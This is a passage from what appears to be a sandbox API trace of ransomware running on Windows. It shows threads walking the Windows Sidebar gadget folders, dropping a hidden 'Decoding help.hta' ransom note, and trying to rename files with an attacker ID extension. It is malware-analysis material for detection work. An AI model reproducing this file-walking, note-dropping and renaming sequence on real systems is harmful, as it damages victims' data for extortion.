ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcba7da4, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbb8d885c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0050.765] lstrcpyW (in: lpString1=0x25390260, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0050.765] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 70 [0050.765] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" [0050.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\decoding help.hta")) returned 0x1 [0050.765] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0050.765] lstrlenW (lpString="logo.png") returned 8 [0050.765] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0050.765] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 70 [0050.765] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png" [0050.765] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png" [0050.765] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.765] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.368] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x1bcdfd30 | out: lpFindFileData=0x1bcdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcba7da4, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcba7da4, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbb8d885c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0052.368] FindClose (in: hFindFile=0x5e2db0 | out: hFindFile=0x5e2db0) returned 1 Thread: id = 428 os_tid = 0xbb0 [0043.904] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*", lpFindFileData=0x1be1fd30 | out: lpFindFileData=0x1be1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2e70 [0045.240] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.241] FindNextFileW (in: hFindFile=0x5e2e70, lpFindFileData=0x1be1fd30 | out: lpFindFileData=0x1be1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.241] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.241] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.241] FindNextFileW (in: hFindFile=0x5e2e70, lpFindFileData=0x1be1fd30 | out: lpFindFileData=0x1be1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa54a84, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbaa54a84, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc07b211c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x7a53, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0045.241] lstrcpyW (in: lpString1=0x98aa858, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0045.241] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 75 [0045.241] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" [0045.241] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\decoding help.hta")) returned 0xffffffff [0045.241] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0045.553] WriteFile (in: hFile=0x1e8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1be1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1be1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.554] CloseHandle (hObject=0x1e8) returned 1 [0045.554] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.819] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0048.819] lstrlenW (lpString="drag.png") returned 8 [0048.819] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0048.819] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 75 [0048.819] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png" [0048.819] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png" [0048.819] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.595] FindNextFileW (in: hFindFile=0x5e2e70, lpFindFileData=0x1be1fd30 | out: lpFindFileData=0x1be1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a844fb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0050.595] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0050.595] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0050.595] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0050.597] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0050.597] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 75 [0050.597] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US" [0050.597] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" [0050.597] GlobalMemoryStatus (in: lpBuffer=0x1be1fd10 | out: lpBuffer=0x1be1fd10) [0050.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2528fe40, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x368 [0050.743] CloseHandle (hObject=0x368) returned 1 [0050.743] FindNextFileW (in: hFindFile=0x5e2e70, lpFindFileData=0x1be1fd30 | out: lpFindFileData=0x1be1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc082453c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xc082453c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xc082453c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x255b, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0050.743] lstrcpyW (in: lpString1=0x25348128, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0050.743] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 75 [0050.743] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" [0050.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\decoding help.hta")) returned 0x1 [0050.744] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0050.744] lstrlenW (lpString="icon.png") returned 8 [0050.744] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0050.744] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 75 [0050.744] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png" [0050.744] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png" [0050.744] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.286] FindNextFileW (in: hFindFile=0x5e2e70, lpFindFileData=0x1be1fd30 | out: lpFindFileData=0x1be1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8196b61f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8196b61f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Images", cAlternateFileName="")) returned 1 [0052.286] lstrcmpW (lpString1=".", lpString2="Images") returned -1 [0052.286] lstrcmpW (lpString1="..", lpString2="Images") returned -1 [0052.286] lstrcmpiW (lpString1="windows", lpString2="Images") returned 1 [0052.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0052.286] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 75 [0052.286] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="Images" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images" [0052.286] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0052.287] GlobalMemoryStatus (in: lpBuffer=0x1be1fd10 | out: lpBuffer=0x1be1fd10) [0052.287] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x116e1ae0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x28c [0052.375] CloseHandle (hObject=0x28c) returned 1 [0052.375] FindNextFileW (in: hFindFile=0x5e2e70, lpFindFileData=0x1be1fd30 | out: lpFindFileData=0x1be1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa7abe3, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbaa7abe3, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0c74d1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0052.375] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0052.375] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 75 [0052.375] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" [0052.376] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\decoding help.hta")) returned 0x1 [0052.376] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0052.376] lstrlenW (lpString="logo.png") returned 8 [0052.376] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0052.376] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 75 [0052.376] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png" [0052.376] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png" [0052.376] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0052.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.376] FindNextFileW (in: hFindFile=0x5e2e70, lpFindFileData=0x1be1fd30 | out: lpFindFileData=0x1be1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa7abe3, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbaa7abe3, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0c74d1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0052.376] FindClose (in: hFindFile=0x5e2e70 | out: hFindFile=0x5e2e70) returned 1 Thread: id = 429 os_tid = 0xba8 [0043.904] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*", lpFindFileData=0x1bf5fd30 | out: lpFindFileData=0x1bf5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2e30 [0045.227] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.227] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x1bf5fd30 | out: lpFindFileData=0x1bf5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.227] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.228] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.228] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x1bf5fd30 | out: lpFindFileData=0x1bf5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbb96990, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbb96990, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc45e1fdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2141, dwReserved0=0x0, dwReserved1=0x0, 